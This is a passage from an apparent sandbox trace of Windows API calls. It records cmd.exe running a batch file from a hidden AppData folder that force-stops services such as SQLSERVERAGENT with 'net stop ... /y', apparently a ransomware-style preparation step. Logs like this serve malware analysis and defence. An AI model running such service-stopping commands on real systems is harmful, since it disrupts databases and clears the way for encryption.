lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0197.050] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0197.050] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0197.050] _get_osfhandle (_FileHandle=3) returned 0x78 [0197.050] SetFilePointer (in: hFile=0x78, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0197.051] GetProcessHeap () returned 0x3e0000 [0197.051] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0197.051] _get_osfhandle (_FileHandle=3) returned 0x78 [0197.051] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0197.051] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xf0c, lpOverlapped=0x0) returned 1 [0197.051] SetFilePointer (in: hFile=0x78, lDistanceToMove=2510, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ce [0197.051] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=25, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SntpService /y\r\n\n/y\r\n\nITORING /y\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 25 [0197.052] _get_osfhandle (_FileHandle=3) returned 0x78 [0197.052] GetFileType (hFile=0x78) returned 0x1 [0197.052] _get_osfhandle (_FileHandle=3) returned 0x78 [0197.052] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ce [0197.052] GetProcessHeap () returned 0x3e0000 [0197.052] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0197.052] GetProcessHeap () returned 0x3e0000 [0197.052] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0197.055] _tell (_FileHandle=3) returned 2510 [0197.056] _close (_FileHandle=3) returned 0 [0197.056] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0197.056] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0197.056] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0197.056] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0197.056] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0197.056] _wcsicmp (_String1="net", _String2="CD") returned 11 [0197.056] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0197.056] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0197.056] _wcsicmp (_String1="net", _String2="REN") returned -4 [0197.056] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0197.056] _wcsicmp (_String1="net", _String2="SET") returned -5 [0197.056] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0197.056] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0197.056] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0197.056] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0197.056] _wcsicmp (_String1="net", _String2="MD") returned 1 [0197.056] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0197.056] _wcsicmp (_String1="net", _String2="RD") returned -4 [0197.056] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0197.056] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0197.056] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0197.056] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0197.056] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0197.056] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0197.056] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0197.056] _wcsicmp (_String1="net", _String2="VER") returned -8 [0197.056] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0197.056] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0197.056] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0197.056] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0197.056] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0197.056] _wcsicmp (_String1="net", _String2="START") returned -5 [0197.056] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0197.057] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0197.057] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0197.057] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0197.057] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0197.057] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0197.057] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0197.057] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0197.057] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0197.057] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0197.057] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0197.057] SetErrorMode (uMode=0x0) returned 0x1 [0197.058] GetProcessHeap () returned 0x3e0000 [0197.058] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0197.058] GetProcessHeap () returned 0x3e0000 [0197.058] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0197.058] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.058] GetProcessHeap () returned 0x3e0000 [0197.058] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0197.058] GetProcessHeap () returned 0x3e0000 [0197.058] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0197.058] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.059] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.059] GetLastError () returned 0x2 [0197.059] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.059] GetLastError () returned 0x2 [0197.060] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.060] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0197.060] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.061] GetLastError () returned 0x2 [0197.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0197.061] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.062] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.062] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0197.062] SetErrorMode (uMode=0x0) returned 0x1 [0197.062] GetProcessHeap () returned 0x3e0000 [0197.063] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0197.063] GetProcessHeap () returned 0x3e0000 [0197.063] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0197.063] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.063] GetProcessHeap () returned 0x3e0000 [0197.063] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0197.063] GetProcessHeap () returned 0x3e0000 [0197.063] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0197.063] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.064] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.064] GetLastError () returned 0x2 [0197.064] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.064] GetLastError () returned 0x2 [0197.065] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.065] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0197.065] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0197.066] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.066] GetLastError () returned 0x2 [0197.066] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0197.066] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0197.066] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.067] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0197.067] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0197.067] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0197.067] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0197.067] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SntpService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SntpService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SntpService /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x89c, dwThreadId=0x8a4)) returned 1 [0197.071] CloseHandle (hObject=0x78) returned 1 [0197.071] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0197.071] GetProcessHeap () returned 0x3e0000 [0197.071] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.071] GetEnvironmentStringsW () returned 0x3f8408* [0197.071] GetProcessHeap () returned 0x3e0000 [0197.071] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.071] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.071] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0197.194] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0197.194] CloseHandle (hObject=0x74) returned 1 [0197.194] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0197.194] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0197.194] GetProcessHeap () returned 0x3e0000 [0197.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.195] GetEnvironmentStringsW () returned 0x3f8408* [0197.195] GetProcessHeap () returned 0x3e0000 [0197.195] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.195] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.195] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0197.195] GetProcessHeap () returned 0x3e0000 [0197.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.195] GetEnvironmentStringsW () returned 0x3f8408* [0197.195] GetProcessHeap () returned 0x3e0000 [0197.195] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.195] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.195] GetProcessHeap () returned 0x3e0000 [0197.195] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0197.195] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0197.195] _get_osfhandle (_FileHandle=1) returned 0x264 [0197.195] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0197.195] _get_osfhandle (_FileHandle=1) returned 0x264 [0197.195] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0197.195] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0197.195] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0197.196] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0197.196] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0197.196] SetConsoleInputExeNameW () returned 0x1 [0197.196] GetConsoleOutputCP () returned 0x1b5 [0197.196] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0197.196] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.196] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0197.196] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0197.197] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.197] SetFilePointer (in: hFile=0x74, lDistanceToMove=2510, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ce [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0197.197] GetProcessHeap () returned 0x3e0000 [0197.197] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0197.197] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.197] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ce [0197.197] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xef3, lpOverlapped=0x0) returned 1 [0197.197] SetFilePointer (in: hFile=0x74, lDistanceToMove=2538, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ea [0197.197] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=28, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLSERVERAGENT /y\r\n\r\n\nITORING /y\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 28 [0197.198] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.198] GetFileType (hFile=0x74) returned 0x1 [0197.198] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.198] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ea [0197.198] GetProcessHeap () returned 0x3e0000 [0197.198] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0197.198] GetProcessHeap () returned 0x3e0000 [0197.198] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0197.201] _tell (_FileHandle=3) returned 2538 [0197.202] _close (_FileHandle=3) returned 0 [0197.202] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0197.202] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0197.202] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0197.202] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0197.202] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0197.202] _wcsicmp (_String1="net", _String2="CD") returned 11 [0197.202] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0197.202] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0197.202] _wcsicmp (_String1="net", _String2="REN") returned -4 [0197.202] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0197.202] _wcsicmp (_String1="net", _String2="SET") returned -5 [0197.202] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0197.202] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0197.202] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0197.202] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0197.202] _wcsicmp (_String1="net", _String2="MD") returned 1 [0197.202] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0197.202] _wcsicmp (_String1="net", _String2="RD") returned -4 [0197.202] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0197.202] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0197.202] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0197.202] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0197.202] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0197.202] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0197.202] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0197.202] _wcsicmp (_String1="net", _String2="VER") returned -8 [0197.202] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0197.202] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0197.202] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0197.203] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0197.203] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0197.203] _wcsicmp (_String1="net", _String2="START") returned -5 [0197.203] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0197.203] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0197.203] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0197.203] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0197.203] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0197.203] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0197.203] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0197.203] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0197.203] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0197.203] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0197.204] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0197.204] SetErrorMode (uMode=0x0) returned 0x1 [0197.204] GetProcessHeap () returned 0x3e0000 [0197.204] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0197.204] GetProcessHeap () returned 0x3e0000 [0197.204] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0197.204] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.204] GetProcessHeap () returned 0x3e0000 [0197.204] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0197.204] GetProcessHeap () returned 0x3e0000 [0197.204] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0197.205] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.205] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.205] GetLastError () returned 0x2 [0197.205] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, 